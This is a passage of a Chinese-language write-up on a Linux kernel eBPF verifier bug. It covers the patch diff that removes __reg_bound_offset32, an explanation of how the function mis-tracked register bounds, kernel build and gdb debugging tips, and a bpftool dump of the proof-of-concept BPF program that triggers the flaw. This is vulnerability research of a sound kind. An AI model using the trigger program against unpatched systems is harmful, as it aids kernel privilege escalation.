9: (76) if w0 s>= 0x303030 goto pc+2

深入思考

作者是如何修复该漏洞的？

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 047b2e8..2a84f73 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -1036,17 +1036,6 @@ static void __reg_bound_offset(struct bpf_reg_state *reg)
                          reg->umax_value));
 }

-static void __reg_bound_offset32(struct bpf_reg_state *reg)
-{
-    u64 mask = 0xffffFFFF;
-    struct tnum range = tnum_range(reg->umin_value & mask,
-                       reg->umax_value & mask);
-    struct tnum lo32 = tnum_cast(reg->var_off, 4);
-    struct tnum hi32 = tnum_lshift(tnum_rshift(reg->var_off, 32), 32);
-
-    reg->var_off = tnum_or(hi32, tnum_intersect(lo32, range));
-}
-
 /* Reset the min/max bounds of a register */
 static void __mark_reg_unbounded(struct bpf_reg_state *reg)
 {
@@ -5805,10 +5794,6 @@ static void reg_set_min_max(struct bpf_reg_state *true_reg,
     /* We might have learned some bits from the bounds. */
     __reg_bound_offset(false_reg);
     __reg_bound_offset(true_reg);
-    if (is_jmp32) {
-        __reg_bound_offset32(false_reg);
-        __reg_bound_offset32(true_reg);
-    }
     /* Intersecting with the old var_off might have improved our bounds
      * slightly.  e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
      * then new var_off is (0; 0x7f...fc) which improves our umax.
@@ -5918,10 +5903,6 @@ static void reg_set_min_max_inv(struct bpf_reg_state *true_reg,
     /* We might have learned some bits from the bounds. */
     __reg_bound_offset(false_reg);
     __reg_bound_offset(true_reg);
-    if (is_jmp32) {
-        __reg_bound_offset32(false_reg);
-        __reg_bound_offset32(true_reg);
-    }
     /* Intersecting with the old var_off might have improved our bounds
      * slightly.  e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
      * then new var_off is (0; 0x7f...fc) which improves our umax.

可以看到，作者只删除了__reg_bound_offset32这一函数便完成了漏洞的修补

为什么__reg_bound_offset32函数会导致漏洞呢？

如果将该函数patch掉，发现，在执行完第五句指令之后，r0->var_off = {0x0, 0x1ffffffff}，而不是patch前的`r0->var_off = {0x30303020, 0x10000001f}

正是由于这里var_off的偏差，如同导火索一般，导致在之后的ALU运算中，内核在调用__update_reg_bounds等函数来更新边界的过程中出现了偏差，导致检验系统的出错

另外，由于系统增加了patch dead code的操作，导致想要利用漏洞构造任意读写的难度大大增加

调试技巧

编译选项

可以将内核中debug info打开，然后再编辑.config文件，开启所有带有BPF字样的配置

其中，CONFIG_BPF_SYSCALL必须打开，不然无法使用bpf系统调用

其他的配置中，某个配置没有打开会导致gdb调试的时候无法在相关函数下断点，而我并没有找是哪一个配置，索性就全部打开

调试

主要调试的代码位于kernel/bpf/verifier.c中，可以根据源代码，利用b kernel/bpf/verifier.c:行数的方式下断点

另外，调试的时候Poc中最后一个跳转最好改变一下，比如从JSGE改为JSLT，使条件不成立，这样可以方便我们多次调试

打印内核中载入的eBPF程序

可以将内核源码复制到镜像中，然后在虚拟机中进入tools/bpf/bpftool目录下，执行make，编译出bpftool

编译完成之后，有两条相关指令

./bpftool p s会显示出内核中载入的eBPF程序的id等信息

root@syzkaller:~# ./bpftool p s
5: socket_filter  tag 31bce63e92f471c4  gpl
    loaded_at 2020-04-17T03:31:44+0000  uid 1000
    xlated 88B  jited 89B  memlock 4096B

./bpftool p d x i id可以打印出具体的eBPF程序

root@syzkaller:~# ./bpftool p d x i 5
   0: (b7) r0 = 808464432
   1: (7f) r0 >>= r0
   2: (14) w0 -= 808464432
   3: (07) r0 += 808464432
   4: (b7) r1 = 808464432
   5: (de) if w1 s<= w0 goto pc+0
   6: (07) r0 += -2144337872
   7: (14) w0 -= -1607454672
   8: (76) if w0 s>= 0x303030 goto pc+1
   9: (05) goto pc-1
  10: (95) exit